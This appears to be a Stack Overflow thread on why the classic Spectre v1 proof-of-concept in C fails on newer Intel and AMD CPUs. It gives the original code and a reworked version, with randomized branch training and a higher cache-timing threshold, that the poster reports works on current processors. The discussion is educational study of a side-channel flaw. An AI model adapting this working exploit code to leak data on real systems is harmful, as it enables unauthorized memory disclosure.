
I know how Spectre works; I found a program on GitHub that demonstrates it. But on my computers running Windows 10 21H2 (i5-11400F, i5-9600K, R7-5800HS) it does not work, it only prints question marks, while on an i5-7500U it works, also on Windows 10. I know there have been patches and fixes since 2018, but they all protect against access to other programs' data; in this case the data that Spectre reads was created by the same program, so the mitigations should not affect the result. Questions:

  1. Can this program work on new processors?
  2. What are its parameters responsible for (why are arrays of those sizes used)?

Code from GitHub:

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#ifdef _MSC_VER
#include <intrin.h> /* for rdtscp and clflush */
#pragma optimize("gt", on)
#else
#include <x86intrin.h> /* for rdtscp and clflush */
#endif

/********************************************************************
Victim code.
********************************************************************/
unsigned int array1_size = 16;
uint8_t unused1[64];
uint8_t array1[160] = { 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16 };
uint8_t unused2[64];
uint8_t array2[256 * 512];

char * secret = "The Magic Words are Squeamish Ossifrage.";

uint8_t temp = 0; /* Used so compiler won't optimize out victim_function() */

void victim_function(size_t x) {
    if (x < array1_size) {
        temp &= array2[array1[x] * 512];
    }
}

/********************************************************************
Analysis code
********************************************************************/
#define CACHE_HIT_THRESHOLD (80) /* assume cache hit if time <= threshold */

/* Report best guess in value[0] and runner-up in value[1] */
void readMemoryByte(size_t malicious_x, uint8_t value[2], int score[2]) {
    static int results[256];
    int tries, i, j, k, mix_i, junk = 0;
    size_t training_x, x;
    uint64_t time1, time2;
    volatile uint8_t * addr;

    for (i = 0; i < 256; i++)
        results[i] = 0;
    for (tries = 999; tries > 0; tries--) {

        /* Flush array2[256*(0..255)] from cache */
        for (i = 0; i < 256; i++)
            _mm_clflush( & array2[i * 512]); /* intrinsic for clflush instruction */

        /* 30 loops: 5 training runs (x=training_x) per attack run (x=malicious_x) */
        training_x = tries % array1_size;
        for (j = 29; j >= 0; j--) {
            _mm_clflush( & array1_size);
            for (volatile int z = 0; z < 100; z++) {} /* Delay (can also mfence) */

            /* Bit twiddling to set x=training_x if j%6!=0 or malicious_x if j%6==0 */
            /* Avoid jumps in case those tip off the branch predictor */
            x = ((j % 6) - 1) & ~0xFFFF; /* Set x=FFF.FF0000 if j%6==0, else x=0 */
            x = (x | (x >> 16)); /* Set x=-1 if j%6==0, else x=0 */
            x = training_x ^ (x & (malicious_x ^ training_x));

            /* Call the victim! */
            victim_function(x);

        }

        /* Time reads. Order is lightly mixed up to prevent stride prediction */
        for (i = 0; i < 256; i++) {
            mix_i = ((i * 167) + 13) & 255;
            addr = & array2[mix_i * 512];
            time1 = __rdtsc(); /* READ TIMER */
            junk = * addr; /* MEMORY ACCESS TO TIME */
            time2 = __rdtsc() - time1; /* READ TIMER & COMPUTE ELAPSED TIME */
            if (time2 <= CACHE_HIT_THRESHOLD && mix_i != array1[tries % array1_size])
                results[mix_i]++; /* cache hit - add +1 to score for this value */
        }

        /* Locate highest & second-highest results tallies in j/k */
        j = k = -1;
        for (i = 0; i < 256; i++) {
            if (j < 0 || results[i] >= results[j]) {
                k = j;
                j = i;
            } else if (k < 0 || results[i] >= results[k]) {
                k = i;
            }
        }
        if (results[j] >= (2 * results[k] + 5) || (results[j] == 2 && results[k] == 0))
            break; /* Clear success if best is > 2*runner-up + 5, or 2 vs 0 */
    }
    results[0] ^= junk; /* use junk so code above won't get optimized out */
    value[0] = (uint8_t) j;
    score[0] = results[j];
    value[1] = (uint8_t) k;
    score[1] = results[k];
}

int main(int argc,
         const char * * argv) {
    size_t malicious_x = (size_t)(secret - (char * ) array1); /* default for malicious_x */
    int i, score[2], len = 40;
    uint8_t value[2];

    for (i = 0; i < sizeof(array2); i++)
        array2[i] = 1; /* write to array2 so in RAM not copy-on-write zero pages */
    if (argc == 3) {
        sscanf(argv[1], "%p", (void * * )( & malicious_x));
        malicious_x -= (size_t) array1; /* Convert input value into a pointer */
        sscanf(argv[2], "%d", & len);
    }

    printf("Reading %d bytes:\n", len);
    while (--len >= 0) {
        printf("Reading at malicious_x = %p... ", (void * ) malicious_x);
        readMemoryByte(malicious_x++, value, score);
        printf("%s: ", (score[0] >= 2 * score[1] ? "Success" : "Unclear"));
        printf("0x%02X='%c' score=%d ", value[0], (value[0] > 31 && value[0] < 127 ? value[0] : '?'), score[0]);
        if (score[1] > 0)
            printf("(second best: 0x%02X score=%d)", value[1], score[1]);
        printf("\n");
    }
    return (0);
}
asked by taburetca; edited by Alan Birtles
  • You should not be using scanf and printf in C++ – stark Jan 21 '22 at 14:15
  • 2
    Rocket Lake was released in March 2021, don't expect it to have flaws identified in 2018. – Hans Passant Jan 21 '22 at 14:32
  • @HansPassant Do you mean this program can't work on new CPUs (10th/11th gen)? I know this program works on 7th-gen Intel Core. – taburetca Jan 21 '22 at 14:54
  • 1
    @stark Why not? These functions are perfectly fine to use from C++. – fuz Jan 21 '22 at 15:38
  • 1
    @taburetca The program demonstrates a defect in some x86 processors. This defect has been fixed in your processor. – fuz Jan 21 '22 at 15:38
  • 1
    @fuz: The interesting question is how it could be fixed / mitigated. There's no call across a privilege boundary here; the "victim" function is part of the same process, and it's using the same `array2` as the attacking code. (Not just some other virtual address that aliases it.) Is this evidence that Rocket Lake invalidates cache lines when discarding cache-miss loads while recovering from a branch miss? Or is this evidence that a different compiler on a different machine did something different, e.g. reordering the load relative to those `__rdtsc()` calls without `lfence`? – Peter Cordes Jan 21 '22 at 19:19
  • 1
    Or is this just an effect of the larger / more associative L1d cache in Rocket Lake (48k 12-way up from 32k 8-way), or different / better branch prediction? Or maybe the `CACHE_HIT_THRESHOLD (80)` default is a bad heuristic? The TSC reference frequency is a lot different from the core frequency in Ice Lake (and presumably Rocket Lake), unlike in early Intel where it was about equal to the reference frequency. (e.g. 4008 MHz on my 4.0 GHz Skylake i7-6700k. But i5-1035 Ice Lake, TSC = 1.5 GHz, non-turbo base = 1.1 GHz) – Peter Cordes Jan 21 '22 at 19:21
  • Hmm, the querent's i5-9600K is "only" Coffee Lake, same microarchitecture as i5-7500U Kaby Lake. Coffee Lake may have done some things to mitigate Meltdown and/or Spectre, but my guesses about different branch prediction, cache, or RDTSC seem unlikely there. – Peter Cordes Jan 21 '22 at 19:28

1 Answer

The Spectre vulnerability also works on new processors. All the mitigations are aimed at preventing one program from reading another program's data, but this example works everywhere, since everything happens inside a single program. I don't know much about operating system internals, but presumably if the attacking program launched the victim program inside itself, it would be possible to read the victim's data.

Changes: I removed what I considered unnecessary for the program to work, such as the score output. I also redid the branch-predictor training: it seems to me that in the program from the question, newer processors predicted the loop pattern and optimized it away, so I used rand() to make that kind of prediction impossible; I did the same in the section that reads data back from the cache. I also removed the

 if (results[j] >= (2 * results[k] + 5) || (results[j] == 2 && results[k] == 0)) 
   break;

It was needed to speed the program up, but its second part seemed wrong to me, so in the end I removed it altogether, since the program already runs fast enough. I also changed the way the input data is supplied and added output options.

#define _CRT_SECURE_NO_WARNINGS
#include <stdio.h>
#include <stdlib.h>
#include <string.h> /* for strlen */
#include <stdint.h>
#ifdef _MSC_VER
#include <intrin.h> // cache intrinsics (Windows)
#else
#include <x86intrin.h> // cache intrinsics
#endif
const unsigned int Time_To_Cashe = 160;
unsigned int array1_size = 5;
uint8_t trash[5] = { 1, 2, 3, 4, 5 }; // junk data used for training
uint8_t array2[256 * 512];
uint8_t temp;

void victim_function(size_t x) { // the Spectre gadget itself
  if (x < array1_size) {
    temp = array2[trash[x] * 512];
  }
}

uint8_t readMemoryByte(int cache_hit_threshold, size_t attack_x) {
  int results[256] = {0};
  int tries, i, max, sim;
  size_t train_x, x;
  register uint64_t Start, Time;
  volatile uint8_t *rd;

  for (tries = 500; tries > 0; tries--) { 
    for (i = 0; i < 256; i++)
      _mm_clflush( & array2[i * 512]); // flush array2 from the cache
    /* train 3 times, attack on the 4th; the j loop below runs 32 rounds */
    train_x = tries % array1_size;
    for (int j = 31; j >= 0; j--) {
      _mm_clflush(&array1_size);
      x = ((rand() + 1) * (j % 4)) % 4 - 1; // randomized mask: always -1 (all ones) when j % 4 == 0
      x = train_x ^ (x & (attack_x ^ train_x)); // an all-ones mask selects attack_x, i.e. we attack when j % 4 == 0
      victim_function(x);
    }
    for (i = 0; i < 256; i++) {
      sim = rand() % 256; // probe in random order so the processor cannot prefetch the accesses
      // it does not matter if some entries are read twice or skipped; with this many tries everything gets read eventually
      rd = & array2[sim * 512];

      unsigned int aux; // __rdtscp takes an unsigned int* for IA32_TSC_AUX, not the probed address
      Start = __rdtscp(&aux); // start timing the access
      int tmp = *rd; // the timed load
      (void)tmp;
      Time = __rdtscp(&aux) - Start;
      if ((int)Time <= cache_hit_threshold && sim != trash[train_x]) // decide whether the data came from cache or RAM
        results[sim]++; // bump this byte value's score
    }

    max = -1;
    for (i = 0; i < 256; i++) {
      if (max < 0 || results[i] >= results[max]) {
        max = i;
      }
    }
  }
  return max; // return the byte value with the highest score
}

static inline void print(char c, FILE *out) {
  if (out == NULL) {
    printf("%c", c);
  }
  else {
    fprintf(out, "%c", c);
  }
}

int main(int argc, char **argv) {
  int cache_hit_threshold = Time_To_Cashe;
  if (argc < 2) {
    fprintf(stderr, "usage: %s <secret string> [output file]\n", argv[0]);
    return 1;
  }
  const char* secret = argv[1];
  size_t malicious_x = (size_t)(secret - (char * ) trash);
  int len = strlen(secret);
  FILE* out = NULL;
  if (argc == 3) {
    out = fopen(argv[2], "w");
  }
  for (int i = 0; i < (int)sizeof(array2); i++) {
    array2[i] = 1; // fill with ones so the pages are actually backed by RAM, not copy-on-write zero pages
  }
   
  while (--len >= 0) { // read in order, one byte at a time
    int tmp = readMemoryByte(cache_hit_threshold, malicious_x++);
    print(tmp, out);
  }
  if (out != NULL) {
    fclose(out);
  }
  return 0;
}

I may be wrong in a lot of places, so correct me if I made a mistake somewhere.

answered by taburetca
  • This works on Windows on the 5800HS and 9600K, and on Linux on a 9300H – taburetca Jan 22 '22 at 16:19
  • CACHE_HIT_THRESHOLD 160 is best, because even at a very low cache frequency everything works; of course it also depends on your RAM and CPU, but on my 3 PCs everything works – taburetca Jan 22 '22 at 16:22
  • What makes the code in this answer work where the code in the question didn't? You should describe in words what the important changes were. Was it `Time_To_Cashe = 160` instead of 80? (That's a spelling error, BTW. The English word is "[cache](https://en.wikipedia.org/wiki/CPU_cache)", pronounced the same as "[cash](https://en.wiktionary.org/wiki/cash#Pronunciation)" but with a separate meaning). – Peter Cordes Jan 22 '22 at 20:15
  • @PeterCordes thanks, I added a description of the changes; later I will add a little more and translate the comments. As you can see, my native language is Russian and I don't know English very well. – taburetca Jan 23 '22 at 03:41
  • @PeterCordes about Time_To_Cache: it's a parameter that it would be desirable to replace with a function that measures the cache access time, but I don't know how. Personally, the program from the question didn't work for me with any value of Time_To_Cache. At the moment I use 160. I ran tests (i5-9600K) with the cache at a very low frequency (0.8 GHz) and the RAM at a high frequency with minimal latency (40 ns); in such cases the value 80 was not enough for the program to work, and 160 turned out to be universal (in my case, at least) – taburetca Jan 23 '22 at 03:42
  • 2
    The cache works at the same frequency as the CPU. But you're always measuring in reference cycles, not core clock cycles anyway, because you're using RDTSC (not RDPMC after making system calls to set up perf counters). So the question becomes, how does the reference frequency compare to RAM. Since cache-miss latency is approximately the same number of nanoseconds independent of CPU frequency, you could maybe calibrate by timing wall-clock and RDTSC for some interval (100 microseconds or something, maybe spinning on a call to a high-precision time function) and dividing. – Peter Cordes Jan 23 '22 at 03:47
  • (Intel server CPUs (Xeon) can run their cache independently of the cores, with each core clocked separately. But I think Intel client chips tie the uncore (L3 / ring bus) clock to the core clock. And all cores share the same clock in Intel client CPUs, other than being halted or not for power-save states.) – Peter Cordes Jan 23 '22 at 03:49
  • Let us [continue this discussion in chat](https://chat.stackoverflow.com/rooms/241317/discussion-between-taburetca-and-peter-cordes). – taburetca Jan 23 '22 at 04:01
  • @PeterCordes, well, I lowered the frequency of the ring bus; doesn't it connect the cores to each other and to the cache? I actually didn't understand which cache the program uses: all of them, L1+L2, or just L1 – taburetca Jan 23 '22 at 04:02
  • @PeterCordes, I didn't understand what you're saying in your message about replacing Time_To_Cache; there are many words I don't know, and the translator produces nonsense. Can you write this piece of code? – taburetca Jan 23 '22 at 04:07